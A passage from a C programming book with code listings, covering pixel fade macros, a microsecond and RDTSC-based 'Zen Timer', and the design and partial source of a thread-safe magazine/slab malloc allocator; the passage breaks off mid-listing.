for (_l = 0 ; _l <= 0xff ; _l++) { \
f = (float)val / 0xff; \
for (_m = 0 ; _m <= 0xff ; _m++) { \
(u8p64k)[_l][_m] = (uint8_t)(_f * _m); \
} \
} \
} while (0)
#define fadein2(src, dest, val, tab) \
do { \
_rval = (tab)[val][redval(src)]; \
_gval = (tab)[val][greenval(src)]; \
_bval = (tab)[val][blueval(src)]; \
mkpix(dest, 0, _rval, _gval, _bval); \
} while (FALSE)
#define fadeout(src, dest, val) \
do { \
val = 0xff - val; \
_rval = (tab)[val][redval(src)]; \
_gval = (tab)[val][greenval(src)]; \
_bval = (tab)[val][blueval(src)]; \
mkpix(dest, 0, _rval, _gval, _bval); \
} while (FALSE)
200 CHAPTER 22. OPTIMISATION TECHNIQUES
Part X
Code Examples
201

Chapter 23
Zen Timer
First of all, greetings to Michael Abrash ; ’sorry’ for stealing the name Zen timer, I
just thought it sounded good and wanted to pay you respect. ;)
Zen Timer implements timers for measuring code execution in microseconds as well
as, currently for IA-32 machines, clock cycles.
23.1 Implementation
23.1.1 Generic Version; gettimeofday()
/*
* Copyright (C) 2005-2010 Tuomo Petteri Venäläinen. All rights reserved.
*/
#ifndef __ZEN_H__
#define __ZEN_H__
#include <stdint.h>
#include <sys/time.h>
typedef volatile struct timeval zenclk_t[2];
#define _tvdiff(tv1, tv2) \
(((tv2)->tv_sec - (tv1)->tv_sec) * 1000000 \
+ ((tv2)->tv_usec - (tv1)->tv_usec))
#define zenzeroclk(id) \
memset(id, 0, sizeof(id))
#define zenstartclk(id) \
gettimeofday(&id[0], NULL)
#define zenstopclk(id) \
gettimeofday(&id[1], NULL)
203
204 CHAPTER 23. ZEN TIMER
#define zenclkdiff(id) \
_tvdiff(&id[0], &id[1])
#endif /* __ZEN_H__ */
23.1.2 IA32 Version; RDTSC
/*
* Copyright (C) 2005-2010 Tuomo Petteri Venäläinen. All rights reserved.
*/
#ifndef __ZENIA32_H__
#define __ZENIA32_H__
#include <stdint.h>
union _tickcnt {
uint64_t u64val;
uint32_t u32vals[2];
};
typedef volatile union _tickcnt zentick_t[2];
#define _rdtsc(ptr) \
__asm__ __volatile__("rdtsc\n" \
"movl %%eax, %0\n" \
"movl %%edx, %1\n" \
: "=m" ((ptr)->u32vals[0]), "=m" ((ptr)->u32vals[1]) \
: \
: "eax", "edx");
#define zenzerotick(id) \
memset(id, 0, sizeof(id))
#define zenstarttick(id) \
_rdtsc(&id[0])
#define zenstoptick(id) \
_rdtsc(&id[1])
#define zentickdiff(id) \
(id[1].u64val - id[0].u64val)
#endif /* __ZENIA32_H__ */
Chapter 24
C Library Allocator
malloc() et al
This section shows a sample implementation of a decent, somewhat scalable, thread-
safe standard library allocator.
POSIX Threads
The allocator in this listing demonstrates simple thread-techniques; one thing to pay
attention to is the use of __thread to declare thread-local storage (TLS), i.e. data that is
only visible to a single thread. This is used to store thread IDs to allow multiple ones to
access the allocator at the same time with less lock contention. pthread_key_create()
is used to specify a function to reclaim arenas when threads terminate; an arena is
reclaimed when there are no more threads attached to it.
For this piece of code, I want to thank Dale Anderson andMatthew Gregan for their
input and Matthew’s nice stress-test routines for the allocator. Cheers New Zealand
boys! :) There are a few other thank yous in the code comments, too.
The allocator should be relatively fast, thread-safe, and scale nicely. It has not been
discontinued, so chances are a thing or a few will change. My main interest is in the
runtime-tuning of allocator behavior which has been started in a simple way (see the
macro TUNEBUF ).
24.1 Design
24.1.1 Buffer Layers
205
206 CHAPTER 24. C LIBRARY ALLOCATOR
Diagram
The following is a simple ASCII diagram borrowed from allocator source.
/*
* malloc buffer layers
* --------------------
*
* --------
* | mag |
* --------
* |
* --------
* | slab |
* --------
* -------- | | -------
* | heap |--| |---| map |
* -------- -------
*
* mag
* ---
* - magazine cache with allocation stack of pointers into the slab
* - LIFO to reuse freed blocks of virtual memory
*
* slab
* ----
* - slab allocator bottom layer
* - power-of-two size slab allocations
* - supports both heap and mapped regions
*
* heap
* ----
* - process heap segment
* - sbrk() interface; needs global lock
*
* map
* ---
* - process map segment
* - mmap() interface; thread-safe
*/
24.1.2 Details
Magazines
The allocator uses a so-called ’Bonwick-style’ buffer (’magazine’) layer on top of a
traditional slab allocator. The magazine layer implements allocation stacks [of point-
ers] for sub-slab regions.
Slabs are power-of-two-size regions. To reduce the number of system calls made, allo-
cations are buffered in magazines. Using pointer stacks for allocations makes reuse of
24.2. IMPLEMENTATION 207
allocated blocks more likely.
TODO: analyse cache behavior here - with Valgrind?
sbrk() and mmap()
The Zero allocator uses sbrk() to expand process heap for smaller allocations, whereas
mmap() is used to allocate bigger chunks of [zeroed] memory. Traditionally, sbrk()
is not thread-safe, so a global lock is necessary to protect global data structures; one
reason to avoid too many calls to sbrk() (which triggers the ’brk’ system call on usual
Unix systems). On the other hand, mmap() is thread safe, so we can use a bit finer-
grained locking with it.
Thread Safety
Zero allocator uses mutexes to guarantee thread-safety; threads running simultaneously
are not allowed to modify global data structures without locking them.
Scalability
The allocator has [currently a fixed number of] arenas. Every thread is given an arena
ID to facilitate running several threads doing allocation without lower likeliness of
lock contention, i.e. without not having to wait for other threads all the time. Mul-
tiprocessor machines are very common today, so this scalability should be good on
many, possibly most new systems. Indeed the allocator has shown good performance
with multithreaded tests; notably faster than more traditional slab allocators. Kudos to
Bonwick et al from Sun Microsystems for inventing the magazine layer. :)
24.2 Implementation
24.2.1 UNIX Interface
POSIX/UNIX
On systems that support it, you can activate POSIX system interface with
#define _POSIX_SOURCE 1
#define _POSIX_C_SOURCE 199506L
In addition to these, you need the -pthread compiler/linker option to build POSIX-
compliant multithread-capable source code.
Header File
Here is a header file I use to compile the allocator - it lists some other feature macros
found on UNIX-like systems.
/*
* Copyright (C) 2007-2008 Tuomo Petteri Venäläinen. All rights reserved.
*/
#ifndef __ZERO_UNIX_H__
#define __ZERO_UNIX_H__
208 CHAPTER 24. C LIBRARY ALLOCATOR
#if 0
/* system feature macros. */
#if !defined(_ISOC9X_SOURCE)
#define _ISOC9X_SOURCE 1
#endif
#if !defined(_POSIX_SOURCE)
#define _POSIX_SOURCE 1
#endif
#if !defined(_POSIX_C_SOURCE)
#define _POSIX_C_SOURCE 199506L
#endif
#if !defined(_LARGEFILE_SOURCE)
#define _LARGEFILE_SOURCE 1
#endif
#if !defined(_FILE_OFFSET_BITS)
#define _FILE_OFFSET_BITS 64
#endif
#if !defined(_LARGE_FILES)
#define _LARGE_FILES 1
#endif
#if !defined(_LARGEFILE64_SOURCE)
#define _LARGEFILE64_SOURCE 1
#endif
#endif /* 0 */
#include <stdint.h>
#include <signal.h>
/* posix standard header. */
#include <unistd.h>
/* i/o headers. */
#include <fcntl.h>
#include <sys/types.h>
#include <sys/uio.h>
#include <sys/stat.h>
#include <sys/mman.h>
#define _SBRK_FAILED ((void *)-1L)
#define _MMAP_DEV_ZERO 0 /* set mmap to use /dev/zero. */
/* some systems may need MAP_FILE with MAP_ANON. */
#ifndef MAP_FILE
#define MAP_FILE 0
#endif
#if !defined(MAP_FAILED)
#define MAP_FAILED ((void *)-1L)
24.2. IMPLEMENTATION 209
#endif
#if (defined(MMAP_DEV_ZERO) && MMAP_DEV_ZERO)
#define mapanon(fd, size) \
mmap(NULL, size, PROT_READ | PROT_WRITE, \
MAP_PRIVATE | MAP_FILE, \
fd, \
0)
#else
#define mapanon(fd, size) \
mmap(NULL, \
size, \
PROT_READ | PROT_WRITE, \
MAP_PRIVATE | MAP_ANON | MAP_FILE, \
fd, \
0)
#endif
#define unmapanon(ptr, size) \
munmap(ptr, size)
#define growheap(ofs) sbrk(ofs)
#endif /* __ZERO_UNIX_H__ */
24.2.2 Source Code
Allocator Source
/*
* Copyright (C) 2008-2012 Tuomo Petteri Venäläinen. All rights reserved.
*
* See the file LICENSE for more information about using this software.
*/
/*
* malloc buffer layers
* --------------------
*
* --------
* | mag |
* --------
* |
* --------
* | slab |
* --------
* -------- | | -------
* | heap |--| |---| map |
* -------- -------
*
210 CHAPTER 24. C LIBRARY ALLOCATOR
* mag
* ---
* - magazine cache with allocation stack of pointers into the slab
* - LIFO to reuse freed blocks of virtual memory
*
* slab
* ----
* - slab allocator bottom layer
* - power-of-two size slab allocations
* - supports both heap and mapped regions
*
* heap
* ----
* - process heap segment
* - sbrk() interface; needs global lock
*
* map
* ---
* - process map segment
* - mmap() interface; thread-safe
*/
#define INTSTAT 0
#define HACKS 0
#define ZEROMTX 1
#define STAT 0
#define SPINLK 0
/* NOT sure if FreeBSD still needs spinlocks */
#if defined(__FreeBSD__)
#undef SPINLK
#define SPINLK 1
#endif
#ifdef _REENTRANT
#ifndef MTSAFE
#define MTSAFE 1
#endif
/*
* TODO
* ----
* - tune nmbuf() and other behavior
* - implement mallopt()
* - improve fault handling
*/
/*
* THANKS
* ------
24.2. IMPLEMENTATION 211
* - Matthew 'kinetik' Gregan for pointing out bugs, giving me cool routines to
* find more of them, and all the constructive criticism etc.
* - Thomas 'Freaky' Hurst for patience with early crashes, 64-bit hints, and
* helping me find some bottlenecks.
* - Henry 'froggey' Harrington for helping me fix issues on AMD64.
* - Dale 'swishy' Anderson for the enthusiasism, encouragement, and everything
* else.
* - Martin 'bluet' Stensgård for an account on an AMD64 system for testing
* earlier versions.
*/
#include <features.h>
#include <errno.h>
#include <stddef.h>
#include <stdlib.h>
#include <stdint.h>
#include <stdio.h>
#define SBRK_FAILED ((void *)-1L)
static void initmall(void);
static void relarn(void *arg);
static void * getmem(size_t size, size_t align, long zero);
static void putmem(void *ptr);
static void * _realloc(void *ptr, size_t size, long rel);
/* red-zones haven't been implemented completely yet... some bugs. */
#define RZSZ 0
#define markred(p) (*(uint64_t *)(p) = UINT64_C(0xb4b4b4b4b4b4b4b4))
#define chkred(p) \
((*(uint64_t *)(p) == UINT64_C(0xb4b4b4b4b4b4b4b4)) \
? 0 \
: 1)
#define LKDBG 0
#define SYSDBG 0
#define VALGRIND 0
#include <string.h>
#if (MTSAFE)
#define PTHREAD 1
#include <pthread.h>
#endif
#endif
#if (ZEROMTX)
#include <zero/mtx.h>
typedef long LK_T;
#elif (SPINLK)
#include <zero/spin.h>
typedef long LK_T;
212 CHAPTER 24. C LIBRARY ALLOCATOR
#elif (PTHREAD)
typedef pthread_mutex_t LK_T;
#endif
#if (VALGRIND)
#include <valgrind/valgrind.h>
#endif
#include <zero/param.h>
#include <zero/cdecl.h>
//#include <mach/mach.h>
#include <zero/trix.h>
#include <zero/unix.h>
//#include <mach/param.h>
#define TUNEBUF 0
/* experimental */
#if (PTRBITS > 32)
#define TUNEBUF 1
#endif
/* basic allocator parameters */
#if (HACKS)
#define BLKMINLOG2 5 /* minimum-size allocation */
#define SLABTEENYLOG2 12 /* little block */
#define SLABTINYLOG2 16 /* small-size block */
#define SLABLOG2 19 /* base size for heap allocations */
#define MAPMIDLOG2 21
#define MAPBIGLOG2 22
#else
#define BLKMINLOG2 5 /* minimum-size allocation */
#define SLABTEENYLOG2 12 /* little block */
#define SLABTINYLOG2 16 /* small-size block */
#define SLABLOG2 20 /* base size for heap allocations */
#define MAPMIDLOG2 22
#endif
#define MINSZ (1UL << BLKMINLOG2)
#define HQMAX SLABLOG2
#define NBKT (8 * PTRSIZE)
#if (MTSAFE)
#define NARN 8
#else
#define NARN 1
#endif
/* lookup tree of tables */
#if (PTRBITS > 32)
#define NL1KEY (1UL << NL1BIT)
#define NL2KEY (1UL << NL2BIT)
#define NL3KEY (1UL << NL3BIT)
24.2. IMPLEMENTATION 213
#define L1NDX (L2NDX + NL2BIT)
#define L2NDX (L3NDX + NL3BIT)
#define L3NDX SLABLOG2
#define NL1BIT 16
#if (PTRBITS > 48)
#define NL2BIT 16
#define NL3BIT (PTRBITS - SLABLOG2 - NL1BIT - NL2BIT)
#else
#define NL2BIT (PTRBITS - SLABLOG2 - NL1BIT)
#define NL3BIT 0
#endif /* PTRBITS > 48 */
#endif /* PTRBITS <= 32 */
/* macros */
#if (TUNEBUF)
#define isbufbkt(bid) ((bid) <= 24)
#define nmagslablog2(bid) (_nslabtab[(bid)])
#else
#define isbufbkt(bid) 0
#define nmagslablog2(bid) (ismapbkt(bid) ? nmaplog2(bid) : nslablog2(bid))
#define nslablog2(bid) 0
#define nmaplog2(bid) 0
#define nslablog2(bid) 0
#define nmaplog2(bid) 0
#endif
#if (TUNEBUF)
/* adjust how much is buffered based on current use */
#define nmagslablog2up(m, v, t) \
do { \
if (t >= (v)) { \
for (t = 0 ; t < NBKT ; t++) { \
_nslabtab[(t)] = m(t); \
} \
} \
} while (0)
#if (HACKS)
#define nmagslablog2init(bid) 0
#define nmagslablog2m64(bid) \
((ismapbkt(bid)) \
? (((bid) <= MAPBIGLOG2) \
? 2 \
: 1) \
: (((bid) <= SLABTEENYLOG2) \
214 CHAPTER 24. C LIBRARY ALLOCATOR
? 0 \
: (((bid) <= SLABTINYLOG2) \
? 1 \
: 2)))
#define nmagslablog2m128(bid) \
((ismapbkt(bid)) \
? (((bid) <= MAPBIGLOG2) \
? 2 \
: 1) \
: (((bid) <= SLABTEENYLOG2) \
? 0 \
: (((bid) <= SLABTINYLOG2) \
? 0 \
: 1)))
#define nmagslablog2m256(bid) \
((ismapbkt(bid)) \
? (((bid) <= MAPBIGLOG2) \
? 2 \
: 1) \
: (((bid) <= SLABTEENYLOG2) \
? 0 \
: (((bid) <= SLABTINYLOG2) \
? 0 \
: 0)))
#define nmagslablog2m512(bid) \
((ismapbkt(bid)) \
? (((bid) <= MAPBIGLOG2) \
? 1 \
: 0) \
: (((bid) <= SLABTEENYLOG2) \
? 0 \
: 0))
#else
#define nmagslablog2init(bid) \
((ismapbkt(bid)) \
? (((bid) <= 23) \
? 2 \
: 1) \
: (((bid) <= SLABTEENYLOG2) \
? 1 \
: (((bid) <= SLABTINYLOG2) \
? 1 \
: 2)))
#define nmagslablog2m64(bid) \
((ismapbkt(bid)) \
? 0 \
: (((bid) <= SLABTEENYLOG2) \
? 0 \
: (((bid) <= SLABTINYLOG2) \
? 1 \
24.2. IMPLEMENTATION 215
: 2)))
#define nmagslablog2m128(bid) \
((ismapbkt(bid)) \
? (((bid) <= 23) \
? 1 \
: 0) \
: (((bid) <= SLABTEENYLOG2) \
? 1 \
: (((bid) <= SLABTINYLOG2) \
? 1 \
: 2)))
#define nmagslablog2m256(bid) \
((ismapbkt(bid)) \
? (((bid) <= 24) \
? 1 \
: 0) \
: (((bid) <= SLABTEENYLOG2) \
? 1 \
: (((bid) <= SLABTINYLOG2) \
? 1 \
: 2)))
#define nmagslablog2m512(bid) \
((ismapbkt(bid)) \
? (((bid) <= 24) \
? 1 \
: 0) \
: (((bid) <= SLABTEENYLOG2) \
? 0 \
: (((bid) <= SLABTINYLOG2) \
? 1 \
: 2)))
#endif
#endif
#define nblklog2(bid) \
((!(ismapbkt(bid)) \
? (SLABLOG2 - (bid)) \
: nmagslablog2(bid)))
#define nblk(bid) (1UL << nblklog2(bid))
#define NBSLAB (1UL << SLABLOG2)
#define nbmap(bid) (1UL << (nmagslablog2(bid) + (bid)))
#define nbmag(bid) (1UL << (nmagslablog2(bid) + SLABLOG2))
#if (PTRBITS <= 32)
#define NSLAB (1UL << (PTRBITS - SLABLOG2))
#define slabid(ptr) ((uintptr_t)(ptr) >> SLABLOG2)
#endif
#define nbhdr() PAGESIZE
#define NBUFHDR 16
#define thrid() ((_aid >= 0) ? _aid : (_aid = getaid()))
216 CHAPTER 24. C LIBRARY ALLOCATOR
#define blksz(bid) (1UL << (bid))
#define usrsz(bid) (blksz(bid) - RZSZ)
#define ismapbkt(bid) (bid > HQMAX)
#define magfull(mag) (!(mag)->cur)
#define magempty(mag) ((mag)->cur == (mag)->max)
#if (ALNSTK)
#define nbstk(bid) max(nblk(bid) * sizeof(void *), PAGESIZE)
#define nbalnstk(bid) nbstk(bid)
#else
#define nbstk(bid) max((nblk(bid) << 1) * sizeof(void *), PAGESIZE)
#endif
#define mapstk(n) mapanon(_mapfd, ((n) << 1) * sizeof(void *))
#define unmapstk(mag) unmapanon((mag)->bptr, mag->max * sizeof(void *))
#define putblk(mag, ptr) \
((gt2(mag->max, 1) \
? (((void **)(mag)->bptr)[--(mag)->cur] = (ptr)) \
: ((mag)->cur = 0, (mag)->adr = (ptr))))
#define getblk(mag) \
((gt2(mag->max, 1) \
? (((void **)(mag)->bptr)[(mag)->cur++]) \
: ((mag)->cur = 1, ((mag)->adr))))
#define NPFBIT BLKMINLOG2
#define BPMASK (~((1UL << NPFBIT) - 1))
#define BDIRTY 0x01UL
#define BALIGN 0x02UL
#define clrptr(ptr) ((void *)((uintptr_t)(ptr) & BPMASK))
#define setflg(ptr, flg) ((void *)((uintptr_t)(ptr) | (flg)))
#define chkflg(ptr, flg) ((uintptr_t)(ptr) & (flg))
#define blkid(mag, ptr) \
((mag)->max + (((uintptr_t)(ptr) - (uintptr_t)(mag)->adr) >> (mag)->bid))
#define putptr(mag, ptr1, ptr2) \
((gt2((mag)->max, 1)) \
? (((void **)(mag)->bptr)[blkid(mag, ptr1)] = (ptr2)) \
: ((mag)->bptr = (ptr2)))
#define getptr(mag, ptr) \
((gt2((mag)->max, 1)) \
? (((void **)(mag)->bptr)[blkid(mag, ptr)]) \
: ((mag)->bptr))
#if (STAT)
#include <stdio.h>
#endif
/* synchonisation */
#if (ZEROMTX)
#define mlk(mp) mtxlk(mp, _aid + 1)
#define munlk(mp) mtxunlk(mp, _aid + 1)
#define mtylk(mp) mtxtrylk(mp, _aid + 1)
#elif (SPINLK)
24.2. IMPLEMENTATION 217
#define mlk(sp) spinlk(sp)
#define munlk(sp) spinunlk(sp)
#define mtrylk(sp) spintrylk(sp)
#elif (MTSAFE)
#if (PTHREAD)
#define mlk(sp) pthread_mutex_lock(sp)
#define munlk(sp) pthread_mutex_unlock(sp)
#define mtrylk(sp) pthread_mutex_trylock(sp)
#else
#define mlk(sp) spinlk(sp)
#define munlk(sp) spinunlk(sp)
#define mtrylk(sp) spintrylk(sp)
#endif
#else
#define mlk(sp)
#define munlk(sp)
#define mtrylk(sp)
#endif
#define mlkspin(sp) spinlk(sp)
#define munlkspin(sp) spinunlk(sp)
#define mtrylkspin(sp) spintry(sp)
/* configuration */
#define CONF_INIT 0x00000001
#define VIS_INIT 0x00000002
struct mconf {
long flags;
#if (MTSAFE)
LK_T initlk;
LK_T arnlk;
LK_T heaplk;
#endif
long scur;
long acur;
long narn;
};
#define istk(bid) \
((nblk(bid) << 1) * sizeof(void *) <= PAGESIZE)
struct mag {
long cur;
long max;
long aid;
long bid;
void *adr;
void *bptr;
struct mag *prev;
struct mag *next;
struct mag *stk[EMPTY];
218 CHAPTER 24. C LIBRARY ALLOCATOR
};
#define nbarn() (blksz(bktid(sizeof(struct arn))))
struct arn {
struct mag *btab[NBKT];
struct mag *ftab[NBKT];
long nref;
long hcur;
long nhdr;
struct mag **htab;
long scur;
LK_T lktab[NBKT];
};
struct mtree {
#if (MTSAFE)
LK_T lk;
#endif
struct mag **tab;
long nblk;
};
/* globals */
#if (INTSTAT)
static uint64_t nalloc[NARN][NBKT];
static long nhdrbytes[NARN];
static long nstkbytes[NARN];
static long nmapbytes[NARN];
static long nheapbytes[NARN];
#endif
#if (STAT)
static unsigned long _nheapreq[NBKT] ALIGNED(PAGESIZE);
static unsigned long _nmapreq[NBKT];
#endif
#if (TUNEBUF)
static long _nslabtab[NBKT];
#endif
#if (MTSAFE)
static LK_T _flktab[NBKT];
#endif
static struct mag *_ftab[NBKT];
#if (HACKS)
static long _fcnt[NBKT];
#endif
static void **_mdir;
static struct arn **_atab;
static struct mconf _conf;
#if (MTSAFE) && (PTHREAD)
static pthread_key_t _akey;
24.2. IMPLEMENTATION 219
static __thread long _aid = -1;
#else
static long _aid = 0;
#endif
#if (TUNEBUF)
static int64_t _nbheap;
static int64_t _nbmap;
#endif
static int _mapfd = -1;
/* utility functions */
static __inline__ long
ceil2(size_t size)
{
size--;
size |= size >> 1;
size |= size >> 2;
size |= size >> 4;
size |= size >> 8;
size |= size >> 16;
#if (LONGSIZE == 8)
size |= size >> 32;
#endif
size++;
return size;
}
static __inline__ long
bktid(size_t size)
{
long tmp = ceil2(size);
long bid;
#if (LONGSIZE == 4)
tzero32(tmp, bid);
#elif (LONGSIZE == 8)
tzero64(tmp, bid);
#endif
return bid;
}
#if (MTSAFE)
static long
getaid(void)
{
long aid;
220 CHAPTER 24. C LIBRARY ALLOCATOR
mlk(&_conf.arnlk);
aid = _conf.acur++;
_conf.acur &= NARN - 1;
pthread_setspecific(_akey, _atab[aid]);
munlk(&_conf.arnlk);
return aid;
}
#endif
static __inline__ void
zeroblk(void *ptr,
size_t size)
{
unsigned long *ulptr = ptr;
unsigned long zero = 0UL;
long small = (size < (LONGSIZE << 3));
long n = ((small)
? (size >> LONGSIZELOG2)
: (size >> (LONGSIZELOG2 + 3)));
long nl = 8;
if (small) {
while (n--) {
*ulptr++ = zero;
}
} else {
while (n--) {
ulptr[0] = zero;
ulptr[1] = zero;
ulptr[2] = zero;
ulptr[3] = zero;
ulptr[4] = zero;
ulptr[5] = zero;
ulptr[6] = zero;
ulptr[7] = zero;
ulptr += nl;
}
}
return;
}
/* fork() management */
#if (MTSAFE)
static void
prefork(void)
{
24.2. IMPLEMENTATION 221
long aid;
long bid;
struct arn *arn;
mlk(&_conf.initlk);
mlk(&_conf.arnlk);
mlk(&_conf.heaplk);
aid = _conf.narn;
while (aid--) {
arn = _atab[aid];
for (bid = 0 ; bid < NBKT ; bid++) {
mlk(&arn->lktab[bid]);
}
}
return;
}
static void
postfork(void)
{
long aid;
long bid;
struct arn *arn;
aid = _conf.narn;
while (aid--) {
arn = _atab[aid];
for (bid = 0 ; bid < NBKT ; bid++) {
munlk(&arn->lktab[bid]);
}
}
munlk(&_conf.heaplk);
munlk(&_conf.arnlk);
munlk(&_conf.initlk);
return;
}
static void
relarn(void *arg)
{
struct arn *arn = arg;
#if (HACKS)
long n = 0;
#endif
long nref;
long bid;
struct mag *mag;
struct mag *head;
222 CHAPTER 24. C LIBRARY ALLOCATOR
nref = --arn->nref;
if (!nref) {
bid = NBKT;
while (bid--) {
mlk(&arn->lktab[bid]);
head = arn->ftab[bid];
if (head) {
#if (HACKS)
n++;
#endif
mag = head;
while (mag->next) {
#if (HACKS)
n++;
#endif
mag = mag->next;
}
mlk(&_flktab[bid]);
mag->next = _ftab[bid];
_ftab[bid] = head;
#if (HACKS)
_fcnt[bid] += n;
#endif
munlk(&_flktab[bid]);
arn->ftab[bid] = NULL;
}
munlk(&arn->lktab[bid]);
}
}
return;
}
#endif /* MTSAFE */
/* statistics */
#if (STAT)
void
printstat(void)
{
long l;
for (l = 0 ; l < NBKT ; l++) {
fprintf(stderr, "%ld\t%lu\t%lu\n", l, _nheapreq[l], _nmapreq[l]);
}
exit(0);
}
24.2. IMPLEMENTATION 223
#elif (INTSTAT)
void
printintstat(void)
{
long aid;
long bkt;
long nbhdr = 0;
long nbstk = 0;
long nbheap = 0;
long nbmap = 0;
for (aid = 0 ; aid < NARN ; aid++) {
nbhdr += nhdrbytes[aid];
nbstk += nstkbytes[aid];
nbheap += nheapbytes[aid];
nbmap += nmapbytes[aid];
fprintf(stderr, "%lx: hdr: %ld\n", aid, nhdrbytes[aid] >> 10);
fprintf(stderr, "%lx: stk: %ld\n", aid, nstkbytes[aid] >> 10);
fprintf(stderr, "%lx: heap: %ld\n", aid, nheapbytes[aid] >> 10);
fprintf(stderr, "%lx: map: %ld\n", aid, nmapbytes[aid] >> 10);
for (bkt = 0 ; bkt < NBKT ; bkt++) {
fprintf(stderr, "NALLOC[%lx][%lx]: %lld\n",
aid, bkt, nalloc[aid][bkt]);
}
}
fprintf(stderr, "TOTAL: hdr: %ld, stk: %ld, heap: %ld, map: %ld\n",
nbhdr, nbstk, nbheap, nbmap);
}
#endif
#if (X11VIS)
#include <X11/Xlibint.h>
#include <X11/Xatom.h>
#include <X11/Xutil.h>
#include <X11/Xmd.h>
#include <X11/Xlocale.h>
#include <X11/cursorfont.h>
#include <X11/keysym.h>
#include <X11/Xlib.h>
static LK_T x11visinitlk;
#if 0
static LK_T x11vislk;
#endif
long x11visinit = 0;
Display *x11visdisp = NULL;
Window x11viswin = None;
Pixmap x11vispmap = None;
GC x11visinitgc = None;
GC x11visfreedgc = None;
224 CHAPTER 24. C LIBRARY ALLOCATOR
GC x11visusedgc = None;
GC x11visresgc = None;
#define x11vismarkfreed(ptr) \
do { \
if (x11visinit) { \
int y = ((uintptr_t)(ptr) >> (BLKMINLOG2 + 10)) & 0x3ff; \
int x = ((uintptr_t)(ptr) >> BLKMINLOG2) & 0x3ff; \
XDrawPoint(x11visdisp, x11vispmap, x11visfreedgc, x, y); \
} \
} while (0)
#define x11vismarkres(ptr) \
do { \
if (x11visinit) { \
int y = ((uintptr_t)(ptr) >> (BLKMINLOG2 + 10)) & 0x3ff; \
int x = ((uintptr_t)(ptr) >> BLKMINLOG2) & 0x3ff; \
XDrawPoint(x11visdisp, x11vispmap, x11visresgc, x, y); \
} \
} while (0)
#define x11vismarkused(ptr) \
do { \
if (x11visinit) { \
int y = ((uintptr_t)(ptr) >> (BLKMINLOG2 + 10)) & 0x3ff; \
int x = ((uintptr_t)(ptr) >> BLKMINLOG2) & 0x3ff; \
XDrawPoint(x11visdisp, x11vispmap, x11visusedgc, x, y); \
} \
} while (0)
void
initx11vis(void)
{
XColor col;
XGCValues gcval;
// mlk(&x11vislk);
mlk(&x11visinitlk);
if (x11visinit) {
munlk(&x11visinitlk);
return;
}
XInitThreads();
x11visdisp = XOpenDisplay(NULL);
if (x11visdisp) {
x11viswin = XCreateSimpleWindow(x11visdisp,
DefaultRootWindow(x11visdisp),
0, 0,
1024, 1024, 0,
BlackPixel(x11visdisp,
DefaultScreen(x11visdisp)),
24.2. IMPLEMENTATION 225
WhitePixel(x11visdisp,
DefaultScreen(x11visdisp)));
if (x11viswin) {
XEvent ev;
x11vispmap = XCreatePixmap(x11visdisp,
x11viswin,
1024, 1024,
DefaultDepth(x11visdisp,
DefaultScreen(x11visdisp)));
gcval.foreground = WhitePixel(x11visdisp,
DefaultScreen(x11visdisp));
x11visinitgc = XCreateGC(x11visdisp,
x11viswin,
GCForeground,
&gcval);
XFillRectangle(x11visdisp,
x11vispmap,
x11visinitgc,
0, 0,
1024, 1024);
col.red = 0x0000;
col.green = 0x0000;
col.blue = 0xffff;
if (!XAllocColor(x11visdisp,
DefaultColormap(x11visdisp,
DefaultScreen(x11visdisp)),
&col)) {
return;
}
gcval.foreground = col.pixel;
x11visfreedgc = XCreateGC(x11visdisp,
x11viswin,
GCForeground,
&gcval);
col.red = 0xffff;
col.green = 0x0000;
col.blue = 0x0000;
if (!XAllocColor(x11visdisp,
DefaultColormap(x11visdisp,
DefaultScreen(x11visdisp)),
&col)) {
return;
}
226 CHAPTER 24. C LIBRARY ALLOCATOR
gcval.foreground = col.pixel;
x11visusedgc = XCreateGC(x11visdisp,
x11viswin,
GCForeground,
&gcval);
col.red = 0x0000;
col.green = 0xffff;
col.blue = 0x0000;
if (!XAllocColor(x11visdisp,
DefaultColormap(x11visdisp,
DefaultScreen(x11visdisp)),
&col)) {
return;
}
gcval.foreground = col.pixel;
x11visresgc = XCreateGC(x11visdisp,
x11viswin,
GCForeground,
&gcval);
XSelectInput(x11visdisp, x11viswin, ExposureMask);
XMapRaised(x11visdisp, x11viswin);
do {
XNextEvent(x11visdisp, &ev);
} while (ev.type != Expose);
XSelectInput(x11visdisp, x11viswin, NoEventMask);
}
}
x11visinit = 1;
munlk(&x11visinitlk);
// munlk(&x11vislk);
}
#endif
static void
initmall(void)
{
long bid = NBKT;
long aid = NARN;
long ofs;
uint8_t *ptr;
mlk(&_conf.initlk);
if (_conf.flags & CONF_INIT) {
munlk(&_conf.initlk);
return;
}
24.2. IMPLEMENTATION 227
#if (STAT)
atexit(printstat);
#elif (INTSTAT)
atexit(printintstat);
#endif
#if (_MMAP_DEV_ZERO)
_mapfd = open("/dev/zero", O_RDWR);
#endif
#if (MTSAFE)
mlk(&_conf.arnlk);
_atab = mapanon(_mapfd, NARN * sizeof(struct arn **));
ptr = mapanon(_mapfd, NARN * nbarn());
aid = NARN;
while (aid--) {
_atab[aid] = (struct arn *)ptr;
ptr += nbarn();
}
aid = NARN;
while (aid--) {
for (bid = 0 ; bid < NBKT ; bid++) {
#if (ZEROMTX)
mtxinit(&_atab[aid]->lktab[bid]);
#elif (PTHREAD) && !SPINLK
pthread_mutex_init(&_atab[aid]->lktab[bid], NULL);
#endif
}
_atab[aid]->hcur = NBUFHDR;
}
_conf.narn = NARN;
pthread_key_create(&_akey, relarn);
munlk(&_conf.arnlk);
#endif
#if (PTHREAD)
pthread_atfork(prefork, postfork, postfork);
#endif
#if (PTHREAD)
while (bid--) {
#if (ZEROMTX)
mtxinit(&_flktab[bid]);
#elif (PTHREAD) && !SPINLK
pthread_mutex_init(&_flktab[bid], NULL);
#endif
}
#endif
mlk(&_conf.heaplk);
ofs = NBSLAB - ((long)growheap(0) & (NBSLAB - 1));
if (ofs != NBSLAB) {
growheap(ofs);
}
munlk(&_conf.heaplk);
228 CHAPTER 24. C LIBRARY ALLOCATOR
#if (PTRBITS <= 32)
_mdir = mapanon(_mapfd, NSLAB * sizeof(void *));
#else
_mdir = mapanon(_mapfd, NL1KEY * sizeof(void *));
#endif
#if (TUNEBUF)
for (bid = 0 ; bid < NBKT ; bid++) {
_nslabtab[bid] = nmagslablog2init(bid);
}
#endif
_conf.flags |= CONF_INIT;
munlk(&_conf.initlk);
#if (X11VIS)
initx11vis();
#endif
return;
}
#if (MTSAFE)
#if (PTRBITS > 32)
#define l1ndx(ptr) getbits((uintptr_t)ptr, L1NDX, NL1BIT)
#define l2ndx(ptr) getbits((uintptr_t)ptr, L2NDX, NL2BIT)
